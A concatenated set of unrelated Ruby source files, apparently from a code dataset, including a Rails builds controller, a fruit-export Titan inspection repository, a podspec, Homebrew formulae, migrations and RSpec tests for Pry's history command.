includes_for_search_columns = columns.collect{ |column| column.includes}.flatten.uniq.compact
self.active_scaffold_includes.concat includes_for_search_columns
active_scaffold_config.list.user.page = nil
end
end
private
def search_authorized_filter
link = active_scaffold_config.field_search.link || active_scaffold_config.field_search.class.link
raise ActiveScaffold::ActionNotAllowed unless self.send(link.security_method)
end
def field_search_formats
(default_formats + active_scaffold_config.formats + active_scaffold_config.field_search.formats).uniq
end
end
end
| 37.04918 | 124 | 0.734956 |
bbbfa0309026ccb997a54427afbfd5138b42dcba | 930 | Pod::Spec.new do |s|
s.name = "TastyTomato"
s.version = "0.36.0"
s.summary = "The Tasty Tomato."
s.description = <<-DESC
Get all the awesome custom UI elements that
resmio uses to make your App really beautiful!
DESC
s.homepage = "https://github.com/resmio/TastyTomato"
s.license = {
:type => "MIT",
:file => "LICENSE"
}
s.authors = {
"Jan Nash" => "[email protected]"
}
s.platform = :ios, "8.0"
s.swift_version = '5.0'
s.source = {
:git => "https://github.com/resmio/TastyTomato.git",
:tag => "v#{s.version}"
}
s.source_files = "TastyTomato/**/*.swift"
s.ios.resource_bundles = {
'TTLocalizations' => ['TastyTomato/Localizations/*.lproj']
}
s.resources = ['TastyTomato/Images/*.{xcassets, png}']
s.public_header_files = []
s.dependency 'SignificantSpices', '~> 0.11.0'
s.dependency 'SwiftDate', '~> 6.0.2'
end
| 29.0625 | 64 | 0.586022 |
ffa6fbadc99ffff48a61fb8f75ae1c8064e9e1bd | 181 | require 'active_record'
class DelayedJobTracking < ActiveRecord::Base
belongs_to :delayed_job, :class_name => "::Delayed::Job"
belongs_to :job_owner, :polymorphic => true
end
| 22.625 | 58 | 0.756906 |
4ad89ef1b91a8dbdb0327c669096f51a36735bb8 | 1,157 | class Roswell < Formula
desc "Lisp installer and launcher for major environments"
homepage "https://github.com/roswell/roswell"
url "https://github.com/roswell/roswell/archive/v17.2.8.74.tar.gz"
sha256 "703095b28cc2985494976b708853566225dd70d4beb1359a1eb7f7038332c221"
head "https://github.com/roswell/roswell.git"
bottle do
sha256 "ea88acfbfa12a98720c8ae7b646f7e429242eed2e5ff0264cec28c3c42fa7d13" => :sierra
sha256 "c39b58fab7e29e6ed9a5d7f936bd0f7f270a9c6e4ba4eaeed8ccf9c5d3f5e14b" => :el_capitan
sha256 "c0614998e5c3661fcb0070592e718870f68f1abb9d52d156815bdd0a311c4035" => :yosemite
end
depends_on "automake" => :build
depends_on "autoconf" => :build
def install
system "./bootstrap"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-manual-generation",
"--enable-html-generation",
"--prefix=#{prefix}"
system "make", "install"
end
test do
ENV["ROSWELL_HOME"] = testpath
system bin/"ros", "init"
File.exist? testpath/".roswell/config"
end
end
| 35.060606 | 92 | 0.680207 |
ff225a66674cbea27e27b4944e4db4ebf426a6a5 | 311 | cask :v1 => 'boxcryptor-classic' do
version :latest
sha256 :no_check
url 'https://www.boxcryptor.com/download/Boxcryptor_Installer.dmg'
name 'Boxcryptor'
name 'Boxcryptor Classic'
homepage 'https://www.boxcryptor.com/en/boxcryptor-classic'
license :commercial
app 'Boxcryptor Classic.app'
end
| 23.923077 | 68 | 0.749196 |
acc299d3f3f53149c90a026c111d66b46c237bba | 956 | require 'rails_helper'
RSpec.describe ButtonComponent, type: :component do
let(:type) { nil }
let(:outline) { false }
let(:content) { 'Button' }
let(:options) do
{
type: type,
}.compact
end
subject(:rendered) { render_inline ButtonComponent.new(outline: outline, **options) { content } }
it 'renders button content' do
expect(rendered).to have_content(content)
end
it 'renders as type=button' do
expect(rendered).to have_css('button[type=button]')
end
it 'renders with design system classes' do
expect(rendered).to have_css('button.usa-button')
end
context 'with outline' do
let(:outline) { true }
it 'renders with design system classes' do
expect(rendered).to have_css('button.usa-button.usa-button--outline')
end
end
context 'with type' do
let(:type) { :submit }
it 'renders as type' do
expect(rendered).to have_css('button[type=submit]')
end
end
end
| 22.232558 | 99 | 0.665272 |
7aeb7b75dc2ace689eff7d9a4a0ea2c618d65cf5 | 888 | # frozen_string_literal: true
class AddSettingsToCommunities < ActiveRecord::Migration[4.2]
def change
add_column :communities, :settings, :text, default: "{}"
Community.all.each do |c|
c.update_attribute(:settings,
case c.name
when "Touchstone"
{meal_reimb_dropoff_loc: "in the lockbox by the Touchstone Common House office (near the east bathroom)"}
when "Great Oak"
{meal_reimb_dropoff_loc: "in the cubby for GO Unit 19 (Kathy) in the Great Oak Common House"}
when "Sunward"
{meal_reimb_dropoff_loc: "in the Common Kitchen cubby in the Sunward Common House"}
else
c.settings # No change
end)
end
end
end
| 42.285714 | 132 | 0.533784 |
6a1e1620e815f1591c60ff3bbfb6c8ad06bb0dea | 985 | # -*- encoding : utf-8 -*-
#
# Cookbook Name:: ruby_install
# Attributes:: default
#
# Author:: Ross Timson <[email protected]>
#
# Copyright 2013, Ross Timson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
default['ruby_install']['version'] = '0.5.0'
default['ruby_install']['checksum'] = 'aa4448c2c356510cc7c2505961961a17bd3f3435842831e04c8516eb703afd19'
# Install rubies into /opt/rubies as expected by Chruby.
default['ruby_install']['default_ruby_base_path'] = '/opt/rubies'
| 35.178571 | 104 | 0.750254 |
b9a848ea9f485df40f2ccef9d7c2af69397f1cd3 | 101 | module TinderfieldsUserImpersonate
class ApplicationController < ::ApplicationController
end
end
| 20.2 | 55 | 0.851485 |
f7f0deb751bb4e6cd93d5f3e4a4d49718a81e9ea | 20,994 | # frozen_null_literal: true
module FinishedGoodsApp
class TitanRepo < BaseRepo
crud_calls_for :titan_requests, name: :titan_request
def find_pallet_for_titan(pallet_id) # rubocop:disable Metrics/AbcSize
oldest_id = DB[:pallet_sequences].where(pallet_id: pallet_id).order(:id).get(:id)
query = MesscadaApp::DatasetPalletSequence.call('WHERE pallet_sequences.id = ? AND pallet_sequences.pallet_id IS NOT NULL')
hash = DB[query, oldest_id].first
raise Crossbeams::FrameworkError, "Pallet not found for pallet_id: #{pallet_id}" if hash.nil_or_empty?
if hash[:nett_weight_per_carton].zero? || hash[:gross_weight_per_carton].zero?
hash[:nett_weight_per_carton] = get_value(:standard_product_weights, :nett_weight, { commodity_id: hash[:commodity_id], standard_pack_id: hash[:standard_pack_id] })
hash[:gross_weight_per_carton] = get_value(:standard_product_weights, :gross_weight, { commodity_id: hash[:commodity_id], standard_pack_id: hash[:standard_pack_id] })
end
hash[:bin] = get(:standard_pack_codes, :bin, hash[:standard_pack_id]) || false
PalletForTitan.new(hash)
end
def find_pallet_sequence_for_titan(id)
query = MesscadaApp::DatasetPalletSequence.call('WHERE pallet_sequences.id = ?')
hash = DB[query, id].first
raise Crossbeams::FrameworkError, "Pallet Sequence not found for pallet_sequence_id: #{id}" if hash.nil_or_empty?
hash[:pallet_percentage] = hash[:pallet_carton_quantity].zero? ? 0 : (hash[:carton_quantity] / hash[:pallet_carton_quantity].to_f).round(3)
PalletSequenceForTitan.new(hash)
end
def find_titan_request(id)
hash = find_hash(:titan_requests, id)
return nil unless hash
if hash[:govt_inspection_sheet_id]
hash = parse_titan_inspection_request_doc(hash)
hash = parse_titan_inspection_result_doc(hash)
end
if hash[:load_id]
hash = parse_titan_addendum_request_doc(hash)
hash = parse_titan_addendum_result_doc(hash)
end
TitanRequestFlat.new(hash)
end
def last_titan_addendum_request(load_id)
hash = DB[:titan_requests].where(load_id: load_id).reverse(:id).first
return nil if hash.nil?
TitanRequest.new(hash)
end
def parse_titan_inspection_request_doc(hash)
request_doc = hash[:request_doc] ||= {}
request_lines = request_doc.delete('consignmentLines') || []
hash[:request_array] = flatten_to_table(request_doc)
hash[:request_array] += flatten_to_table(request_lines)
hash
end
def parse_titan_inspection_result_doc(hash)
result_doc = hash[:result_doc] ||= {}
result_doc = { 'message' => result_doc } if result_doc.is_a?(String)
result_doc.delete('type')
result_doc.delete('traceId')
result_lines = result_doc.delete('errors') || []
hash[:result_array] = flatten_to_table(result_doc)
hash[:result_array] += flatten_to_table(result_lines)
hash
end
def parse_titan_addendum_request_doc(hash)
request_doc = hash[:request_doc] ||= {}
addendum_details = request_doc.delete('addendumDetails') || []
consignment_items = request_doc.delete('consignmentItems') || []
hash[:request_array] = flatten_to_table(request_doc)
hash[:request_array] += flatten_to_table(addendum_details, prefix: 'AddendumDetails')
hash[:request_array] += flatten_to_table(consignment_items, prefix: 'ConsignmentItems')
hash
end
def parse_titan_addendum_result_doc(hash)
result_doc = hash[:result_doc] ||= {}
result_doc.delete('type')
result_doc.delete('traceId')
result_lines = result_doc.delete('errors')
hash[:result_array] = flatten_to_table(result_doc)
hash[:result_array] += flatten_to_table(result_lines, prefix: 'Error: ') if result_lines.is_a? Hash
hash
end
def find_titan_inspection(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
hash = {}
ds = DB[:titan_requests].where(govt_inspection_sheet_id: govt_inspection_sheet_id).reverse(:id)
return nil unless ds.get(:id)
hash[:govt_inspection_sheet_id] = govt_inspection_sheet_id
hash[:reinspection] = get(:govt_inspection_sheets, :reinspection, govt_inspection_sheet_id)
hash[:validated] = ds.where(request_type: 'Validation').get(:success)
hash[:request_type] = ds.get(:request_type)
hash[:success] = ds.get(:success)
hash[:inspection_message_id] = ds.exclude(inspection_message_id: nil).get(:inspection_message_id)
result_doc = ds.where(request_type: 'Results').get(:result_doc) || {}
hash[:upn] = result_doc['upn']
hash[:titan_inspector] = result_doc['inspector']
hash[:pallets] = []
consignment_lines = result_doc['consignmentLines'] || []
consignment_lines.each do |line|
pallet_number = line['sscc']
pallet_id = get_id(:pallets, pallet_number: pallet_number)
raise Crossbeams::FrameworkError, "Pallet id not found for #{pallet_number}" unless pallet_id
hash[:pallets] << { pallet_id: pallet_id, pallet_number: pallet_number, passed: line['result'] == 'Pass', rejection_reasons: line['rejectionReasons'] || [] }
end
TitanInspectionFlat.new(hash)
end
def compile_inspection(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
govt_inspection_sheet = GovtInspectionRepo.new.find_govt_inspection_sheet(govt_inspection_sheet_id)
{ consignmentNumber: govt_inspection_sheet.consignment_note_number,
bookingRef: govt_inspection_sheet.booking_reference,
exporter: party_repo.find_registration_code_for_party_role('FBO', govt_inspection_sheet.exporter_party_role_id),
billingParty: party_repo.find_registration_code_for_party_role('BILLING', govt_inspection_sheet.inspection_billing_party_role_id),
# inspectionPoint: AppConst::TITAN_INSPECTION_API_USER_ID,
inspectionPoint: govt_inspection_sheet.inspection_point,
inspector: govt_inspection_sheet.inspector_code,
inspectionDate: Time.now.strftime('%Y-%m-%d'),
inspectionTime: Time.now.strftime('%k:%M:%S'),
consignmentLines: compile_inspection_pallets(govt_inspection_sheet_id) }
end
def compile_inspection_pallets(govt_inspection_sheet_id) # rubocop:disable Metrics/AbcSize
pallet_ids = select_values(:govt_inspection_pallets, :pallet_id, govt_inspection_sheet_id: govt_inspection_sheet_id)
govt_inspection_sheet = GovtInspectionRepo.new.find_govt_inspection_sheet(govt_inspection_sheet_id)
inspection_pallets = []
pallet_ids.each do |pallet_id|
pallet = find_pallet_for_titan(pallet_id)
ecert_agreement_id = get_value(:ecert_tracking_units, :ecert_agreement_id, pallet_id: pallet_id)
ecert_agreement_code = get(:ecert_agreements, :code, ecert_agreement_id)
inspection_pallets << { phc: pallet.phc,
sscc: pallet.pallet_number,
commodity: pallet.commodity,
variety: pallet.marketing_variety,
class: pallet.inspection_class || pallet.grade,
inspectionSampleWeight: pallet.nett_weight_per_carton.to_f.round(3),
nettWeightPack: pallet.nett_weight_per_carton.to_f.round(3),
grossWeightPack: pallet.gross_weight_per_carton.to_f.round(3),
carton: pallet.bin ? 'B' : 'C',
cartonQty: pallet.pallet_carton_quantity,
targetRegion: govt_inspection_sheet.destination_region,
targetCountry: govt_inspection_sheet.iso_country_code,
protocolExceptionIndicator: govt_inspection_sheet.titan_protocol_exception || 'NA',
agreementCode: ecert_agreement_code,
consignmentLinePallets: compile_inspection_pallet_sequences(pallet_id) }
end
inspection_pallets
end
def compile_inspection_pallet_sequences(pallet_id) # rubocop:disable Metrics/AbcSize
pallet_sequence_ids = select_values(:pallet_sequences, :id, pallet_id: pallet_id)
inspection_pallet_sequences = []
pallet_sequence_ids.each do |pallet_sequence_id|
pallet_sequence = find_pallet_sequence_for_titan(pallet_sequence_id)
inspection_pallet_sequences << {
ssccReference: pallet_sequence.pallet_number,
palletQty: pallet_sequence.carton_quantity,
ssccSequenceNumber: pallet_sequence.pallet_sequence_number,
puc: pallet_sequence.puc,
orchard: pallet_sequence.orchard,
phytoData: pallet_sequence.phyto_data || '',
packCode: pallet_sequence.std_pack,
packDate: pallet_sequence.palletized_at || pallet_sequence.partially_palletized_at,
# FIXME: remove partially_palletized_at should only use palletized_at
sizeCount: pallet_sequence.actual_count.nil_or_empty? ? pallet_sequence.size_ref : pallet_sequence.actual_count.to_i,
inventoryCode: pallet_sequence.inventory_code,
prePackingTreatment: 'NA'
}
end
inspection_pallet_sequences
end
def find_titan_addendum(load_id, mode) # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity
return nil if mode == :request
request_type = case mode
when :status
AppConst::TITAN_ADDENDUM_REQUEST
when :cancel
AppConst::TITAN_ADDENDUM_REQUEST
when :load
[AppConst::TITAN_ADDENDUM_STATUS, AppConst::TITAN_ADDENDUM_REQUEST]
end
hash = DB[:titan_requests].where(load_id: load_id, request_type: request_type).reverse(:id).first
return nil unless hash
status_hash = hash[:result_doc] || {}
hash[:addendum_status] = status_hash['addendumStatus']
# hash[:best_regime_code] = status_hash['bestRegimeCode']
hash[:verification_status] = status_hash['verificationStatus']
hash[:addendum_validations] = status_hash['addendumValidations']
# hash[:available_regime_code] = status_hash['availableRegimeCode']
hash[:e_cert_response_message] = status_hash['eCertResponseMessage']
hash[:e_cert_hub_tracking_number] = status_hash['eCertHubTrackingNumber']
hash[:e_cert_hub_tracking_status] = status_hash['eCertHubTrackingStatus']
# hash[:e_cert_application_status] = status_hash['ecertApplicationStatus']
# hash[:phyt_clean_verification_key] = status_hash['phytCleanVerificationKey']
hash[:export_certification_status] = status_hash['exportCertificationStatus']
cancel = DB[:titan_requests].where(load_id: load_id, request_type: AppConst::TITAN_ADDENDUM_CANCEL).reverse(:id).first || {}
cancel_hash = cancel[:result_doc] || {}
hash[:cancelled_status] = cancel_hash['message']
hash[:cancelled_at] = cancel[:updated_at]
TitanAddendumFlat.new(hash)
end
def compile_addendum(load_id) # rubocop:disable Metrics/AbcSize
load = LoadRepo.new.find_load(load_id)
consignor_address = party_repo.find_address_for_party_role('Delivery Address', load.exporter_party_role_id)
consignee_address = party_repo.find_address_for_party_role('Delivery Address', load.consignee_party_role_id)
pallet_ids = select_values(:pallets, :id, load_id: load_id)
ecert_agreement_ids = select_values(:ecert_tracking_units, :ecert_agreement_id, pallet_id: pallet_ids)
ecert_agreement_codes = select_values(:ecert_agreements, :code, id: ecert_agreement_ids).join('')
fbo_code = party_repo.find_registration_code_for_party_role('FBO', load.exporter_party_role_id).to_s
payload = {
eCertRequired: false,
cbrid: 0,
cbrBillingID: 0,
requestId: "#{fbo_code}#{Time.now.strftime('%Y%m%d')}#{load_id}",
eCertAgreementCode: ecert_agreement_codes,
exporterCode: fbo_code,
consignorName: party_repo.find_organization_for_party_role(load.exporter_party_role_id).medium_description,
consignorAddressLine1: [consignor_address&.address_line_1, consignor_address&.address_line_2, consignor_address&.address_line_3].compact!.join(', '),
consignorAddressLine2: consignor_address&.city,
consignorAddressLine3: consignor_address&.postal_code,
consigneeId: party_repo.find_organization_for_party_role(load.consignee_party_role_id).short_description,
consigneeName: party_repo.find_organization_for_party_role(load.consignee_party_role_id).medium_description,
consigneeAddressLine1: [consignee_address&.address_line_1, consignee_address&.address_line_2, consignee_address&.address_line_3].compact!.join(', '),
consigneeAddressLine2: consignee_address&.city,
consigneeAddressLine3: consignee_address&.postal_code,
consigneeCountryId: load.iso_country_code,
importCountryId: load.iso_country_code,
cfCode: party_repo.find_registration_code_for_party_role('CF', load.shipper_party_role_id).to_s,
lspCode: party_repo.find_registration_code_for_party_role('LSP', load.shipper_party_role_id).to_s,
transportType: get(:voyage_types, :industry_description, load.voyage_type_id),
vesselName: load.vessel_code,
vesselType: load.container ? 'CONTAINER' : 'CONVENTIONAL',
voyageNumber: load.voyage_number,
regimeCode: load.temperature_code,
shippingBookingReference: load.booking_reference,
loadPort: load.pol_port_code,
dischargePort: load.pod_port_code,
shippedTargetCountry: load.iso_country_code,
shippedTargetRegion: load.destination_region,
locationOfIssue: load.location_of_issue, # Cannot be blank
eCertDesiredIssueLocation: '',
estimatedDepartureDate: load.etd&.strftime('%F'), # Cannot be blank
supportingDocuments: [
# {
# supportingDocumentCode: '',
# supportingDocumentName: ''
# mimetype: '',
# isPrintable: '',
# # supportingDocument: byte[]
# }
],
consignmentItems: [compile_consignment_items(load)],
addendumDetails: compile_addendum_details(load_id),
flexiFields: []
}
res = validate_addendum_payload(payload)
raise Crossbeams::InfoError, "Invalid addendum request: #{unwrap_error_set(res.errors)}" if res.failure?
res.to_h
end
def compile_consignment_items(load)
pallet_id = select_values_in_order(:pallets, :id, where: { load_id: load.id }, order: :id).first
pallet = find_pallet_for_titan(pallet_id)
{
CommonName: pallet.commodity_description, # Cannot be blank - BUT: "CommonName" (use cultivar?)
ScientificName: pallet.commodity_description, # Cannot be blank - BUT: "ScientificName"
nettWeightMeasureCode: 'KG',
nettWeightMeasure: load.nett_weight.to_f.round(2),
grossWeightMeasureCode: 'KG',
grossWeightMeasure: load.verified_gross_weight.to_f.round(2),
customsHarmonizedSystemClass: '',
commodityVegetableClass: pallet.commodity, # ???
commodityConditionClass: '',
commodityIntentOfUseClass: '',
appliedProcessStartDate: nil,
appliedProcessEndDate: nil,
durationMeasureCode: '',
durationMeasure: '',
appliedProcessTreatmentTypeLevel1: '',
appliedProcessTreatmentTypeLevel2: '',
appliedProcessChemicalCode: '',
fullTreatmentInfromation: '',
appliedProcessTemperatureUnitCode: '',
appliedProcessTemperature: 0.00,
appliedProcessConcentrationUnitCode: '',
appliedProcessConcentration: 0.00,
appliedProcessAdditionalNotes: '',
packageLevelCode: 0,
packageTypeCode: pallet.basic_pack,
packageItemUnitCode: 'EA',
packageItemQuantity: load.pallet_count,
packageShippingMarks: '',
additionalConsignmentNotes: load.memo_pad
}
end
def compile_addendum_details(load_id) # rubocop:disable Metrics/AbcSize
gi_repo = GovtInspectionRepo.new
details = []
pallet_ids = select_values(:pallets, :id, load_id: load_id)
pallet_ids.each do |pallet_id|
pallet = find_pallet_for_titan(pallet_id)
govt_inspection_sheet = gi_repo.find_govt_inspection_sheet(pallet.govt_inspection_sheet_id)
raise Crossbeams::FrameworkError, "Pallet #{pallet.pallet_number} is not on a govt. inspection sheet" if govt_inspection_sheet.nil?
govt_inspection_pallet = gi_repo.find_govt_inspection_pallet(pallet.govt_inspection_pallet_id)
details << {
stuffLoadDate: pallet.shipped_at.strftime('%F'),
loadPointFboCode: AppConst::CR_FG.titan_cold_store_fbo_code,
consignmentNumber: pallet.consignment_note_number,
phc: pallet.phc,
inspectedSSCC: pallet.pallet_number,
clientRef: pallet_id.to_s,
upn: govt_inspection_sheet.upn,
inspectedTargetRegion: govt_inspection_sheet.destination_region,
inspectedTargetCountry: govt_inspection_sheet.iso_country_code,
commodityCode: pallet.commodity,
fleshColour: '', # ???
varietyCode: pallet.marketing_variety,
protocolExceptionIndicator: govt_inspection_sheet.titan_protocol_exception || 'NA',
productClass: pallet.inspection_class || pallet.grade,
nettWeight: pallet.nett_weight.to_f.round(2),
grossWeight: pallet.gross_weight.to_f.round(2), # If derived weight, add this to nett? OR...?
cartonQuantity: pallet.pallet_carton_quantity,
inspectionPoint: govt_inspection_sheet.inspection_point,
inspectorCode: govt_inspection_sheet.inspector_code,
inspectionDate: govt_inspection_pallet.inspected_at.strftime('%F'),
containerNumber: pallet.container,
addendumDetailLines: compile_addendum_detail_sequences(pallet_id)
}
end
details
end
def compile_addendum_detail_sequences(pallet_id)
pallet_sequence_ids = select_values(:pallet_sequences, :id, pallet_id: pallet_id)
sequences = []
pallet_sequence_ids.each do |pallet_sequence_id|
pallet_sequence = find_pallet_sequence_for_titan(pallet_sequence_id)
sequences << {
sequenceNumberOfInspectedSSCC: pallet_sequence.pallet_sequence_number,
puc: pallet_sequence.puc,
orchard: pallet_sequence.orchard,
productionArea: pallet_sequence.production_region,
phytoData: pallet_sequence.phyto_data || '',
sizeCountBerrySize: pallet_sequence.edi_size_count, # Cannot be blank
packCode: pallet_sequence.std_pack,
palletQuantity: pallet_sequence.carton_quantity,
nettPalletWeight: pallet_sequence.sequence_nett_weight.to_f.round(2)
}
end
sequences
end
def party_repo
MasterfilesApp::PartyRepo.new
end
def humanize(value)
array = value.to_s.split(/(?=[A-Z])/)
array.map(&:capitalize).join('')
end
def flatten_to_table(input, prefix: nil) # rubocop:disable Metrics/AbcSize
array_out = []
is_an_array = input.is_a? Array
input = [input] unless is_an_array
Array(0...input.length).each do |i|
if input[i].is_a?(String)
array_out << { column: 'Message', value: input[i] }
else
input[i].each do |k, v|
column = "#{prefix}#{humanize(k)}"
column = "#{humanize(k)}[#{i}]" if is_an_array
column = "#{prefix}[#{i}].#{humanize(k)}" if prefix && is_an_array
array_out << { column: column, value: Array(v).map { |vv| UtilityFunctions.scientific_notation_to_s(vv) }.join(' ') }
end
end
end
array_out
end
private
def validate_addendum_payload(payload)
TitanAddendumPayloadSchema.call(payload)
end
# def sort_like(left, right)
# raise ArgumentError, 'Hash input required for "sort_like" method' unless (left.is_a? Hash) || (right.is_a? Hash)
#
# right_sorted = {}
# left.each do |left_key, left_value|
# right_value = right[left_key]
# if right_value.is_a? Array
# sorted_array = []
# right_value.each do |hash|
# sorted_array << sort_like(left_value.first, hash)
# end
# right_sorted[left_key] = sorted_array
# next
# end
# right_sorted[left_key] = right[left_key]
# end
#
# # check that all keys are present
# right.each do |k, v|
# next if right_sorted[k]
#
# right_sorted[k] = v
# end
#
# right_sorted
# end
end
end
| 48.373272 | 174 | 0.691245 |
9132f38b7710ffc153475bf8ed987de25b6d1cb0 | 2,802 | require 'travis'
class BuildsController < ApplicationController
respond_to :json
# github does not currently post the payload with the correct
# accept or content-type headers, we need to change the
# the github-service code for this to work correctly
skip_before_filter :verify_authenticity_token, :only => :create
def index
not_found unless repository = Repository.find_by_params(params)
respond_with(repository.builds.recent(params[:page]))
end
def show
not_found unless build = Build.find(params[:id])
respond_with(build)
end
def create
if build = Build.create_from_github_payload(params[:payload], api_token)
build.save!
enqueue!(build)
build.repository.update_attributes!(:last_build_started_at => Time.now) # TODO the build isn't actually started now
end
render :nothing => true
end
def update
build = Build.find(params[:id])
build.update_attributes!(params[:build].except(:queue))
if build.was_started?
trigger('build:started', build, 'msg_id' => params[:msg_id])
elsif build.matrix_expanded?
build.matrix.each { |child| enqueue!(child) }
trigger('build:configured', build, 'msg_id' => params[:msg_id])
elsif build.was_configured? && build.approved?
enqueue!(build)
trigger('build:configured', build, 'msg_id' => params[:msg_id])
elsif !build.approved?
build.destroy
trigger('build:removed', build, 'msg_id' => params[:msg_id])
elsif build.was_finished?
trigger('build:finished', build, 'msg_id' => params[:msg_id])
Travis::Notifications.send_notifications(build)
end
render :nothing => true
end
def log
build = Build.find(params[:id], :select => "id, repository_id, parent_id", :include => [:repository])
build.append_log!(params[:build][:log]) unless build.finished?
trigger('build:log', build, 'build' => { '_log' => params[:build][:log] }, 'msg_id' => params[:msg_id])
render :nothing => true
end
protected
def enqueue!(build)
job_info = Travis::Worker.enqueue(build)
trigger('build:queued', build, job_info.slice('queue'))
end
def trigger(event, build, data = {})
push(event, json_for(event, build).deep_merge(data))
trigger(event, build.parent) if event == 'build:finished' && build.parent.try(:finished?)
end
def json_for(event, build)
{ 'build' => build.as_json(:for => event.to_sym), 'repository' => build.repository.as_json(:for => event.to_sym) }
end
def push(event, data)
Pusher[event == 'build:queued' ? 'jobs' : 'repositories'].trigger(event, data)
end
def api_token
credentials = ActionController::HttpAuthentication::Basic.decode_credentials(request)
credentials.split(':').last
end
end
| 31.483146 | 121 | 0.676303 |
1ad027b902611e2af075075260a10c4fdf261b07 | 148 | FactoryBot.define do
factory :shipping_rate, class: Spree::ShippingRate do
cost { BigDecimal(10) }
shipping_method
shipment
end
end
| 18.5 | 55 | 0.722973 |
6a7da7c84d2513d3f52ca90f6e2623545af9bbad | 552 | ENV['CUCUMBER_COLORS'] = nil
$:.unshift(File.dirname(__FILE__))
# For Travis....
require 'cucumber/encoding'
require 'simplecov_setup'
require 'pry'
require 'cucumber'
RSpec.configure do |c|
c.before do
::Cucumber::Term::ANSIColor.coloring = true
end
end
module RSpec
module WorkInProgress
def pending_under(platforms, reason, &block)
if [platforms].flatten.map(&:to_s).include? RUBY_PLATFORM
pending "pending under #{platforms.inspect} because: #{reason}", &block
else
yield
end
end
end
end
| 18.4 | 79 | 0.682971 |
e9a0bec56f7196cb05d134b978c19a616127ff9a | 6,272 | describe "hist" do
before do
Pry.history.clear
@hist = Pry.history
@str_output = StringIO.new
@t = pry_tester history: @hist do
# For looking at what hist pushes into the input stack. The implementation
# of this helper will definitely have to change at some point.
def next_input
@pry.input.string
end
end
end
it 'should replay history correctly (single item)' do
o = Object.new
@hist.push "@x = 10"
@hist.push "@y = 20"
@hist.push "@z = 30"
@t.push_binding o
@t.eval 'hist --replay -1'
expect(o.instance_variable_get(:@z)).to eq 30
end
it 'should replay a range of history correctly (range of items)' do
o = Object.new
@hist.push "@x = 10"
@hist.push "@y = 20"
@t.push_binding o
@t.eval 'hist --replay 0..2'
expect(@t.eval('[@x, @y]')).to eq [10, 20]
end
# this is to prevent a regression where input redirection is
# replaced by just appending to `eval_string`
it 'should replay a range of history correctly (range of commands)' do
@hist.push "cd 1"
@hist.push "cd 2"
@t.eval("hist --replay 0..2")
stack = @t.eval("Pad.stack = _pry_.binding_stack.dup")
expect(stack.map { |b| b.eval("self") }).to eq [TOPLEVEL_BINDING.eval("self"), 1, 2]
end
it 'should grep for correct lines in history' do
@hist.push "abby"
@hist.push "box"
@hist.push "button"
@hist.push "pepper"
@hist.push "orange"
@hist.push "grape"
@hist.push "def blah 1"
@hist.push "def boink 2"
@hist.push "place holder"
expect(@t.eval('hist --grep o')).to match(/\d:.*?box\n\d:.*?button\n\d:.*?orange/)
# test more than one word in a regex match (def blah)
expect(@t.eval('hist --grep def blah')).to match(/def blah 1/)
# test more than one word with leading white space in a regex match (def boink)
expect(@t.eval('hist --grep def boink')).to match(/def boink 2/)
end
it 'should return last N lines in history with --tail switch' do
("a".."z").each do |v|
@hist.push v
end
out = @t.eval 'hist --tail 3'
expect(out.each_line.count).to eq 3
expect(out).to match(/x\n\d+:.*y\n\d+:.*z/)
end
it "should start from beginning if tail number is longer than history" do
@hist.push 'Hyacinth'
out = @t.eval 'hist --tail'
expect(out).to match(/Hyacinth/)
end
it 'should apply --tail after --grep' do
@hist.push "print 1"
@hist.push "print 2"
@hist.push "puts 3"
@hist.push "print 4"
@hist.push "puts 5"
out = @t.eval 'hist --tail 2 --grep print'
expect(out.each_line.count).to eq 2
expect(out).to match(/\d:.*?print 2\n\d:.*?print 4/)
end
it 'should apply --head after --grep' do
@hist.push "puts 1"
@hist.push "print 2"
@hist.push "puts 3"
@hist.push "print 4"
@hist.push "print 5"
out = @t.eval 'hist --head 2 --grep print'
expect(out.each_line.count).to eq 2
expect(out).to match(/\d:.*?print 2\n\d:.*?print 4/)
end
# strangeness in this test is due to bug in Readline::HISTORY not
# always registering first line of input
it 'should return first N lines in history with --head switch' do
("a".."z").each do |v|
@hist.push v
end
out = @t.eval 'hist --head 4'
expect(out.each_line.count).to eq 4
expect(out).to match(/a\n\d+:.*b\n\d+:.*c/)
end
# strangeness in this test is due to bug in Readline::HISTORY not
# always registering first line of input
it 'should show lines between lines A and B with the --show switch' do
("a".."z").each do |v|
@hist.push v
end
out = @t.eval 'hist --show 1..4'
expect(out.each_line.count).to eq 4
expect(out).to match(/b\n\d+:.*c\n\d+:.*d/)
end
it "should store a call with `--replay` flag" do
@t.eval ":banzai"
@t.eval "hist --replay 1"
expect(@t.eval("hist")).to match(/hist --replay 1/)
end
it "should not contain lines produced by `--replay` flag" do
@t.eval ":banzai"
@t.eval ":geronimo"
@t.eval ":huzzah"
@t.eval("hist --replay 1..3")
output = @t.eval("hist")
expect(output).to eq "1: :banzai\n2: :geronimo\n3: :huzzah\n4: hist --replay 1..3\n"
end
it "should raise CommandError when index of `--replay` points out to another `hist --replay`" do
@t.eval ":banzai"
@t.eval "hist --replay 1"
expect { @t.eval "hist --replay 2" }.to raise_error(Pry::CommandError, /Replay index 2 points out to another replay call: `hist --replay 1`/)
end
it "should disallow execution of `--replay <i>` when CommandError raised" do
@t.eval "a = 0"
@t.eval "a += 1"
@t.eval "hist --replay 2"
expect { @t.eval "hist --replay 3" }.to raise_error Pry::CommandError
expect(@t.eval("a")).to eq 2
expect(@t.eval("hist").lines.to_a.size).to eq 5
end
it "excludes Pry commands from the history with `-e` switch" do
@hist.push('a = 20')
@hist.push('ls')
expect(pry_eval('hist -e')).to eq "1: a = 20\n"
end
describe "sessions" do
before do
@old_file = Pry.config.history.file
Pry.config.history.file = File.expand_path('spec/fixtures/pry_history')
@hist.load
end
after do
Pry.config.history.file = @old_file
end
it "displays history only for current session" do
@hist.push('hello')
@hist.push('world')
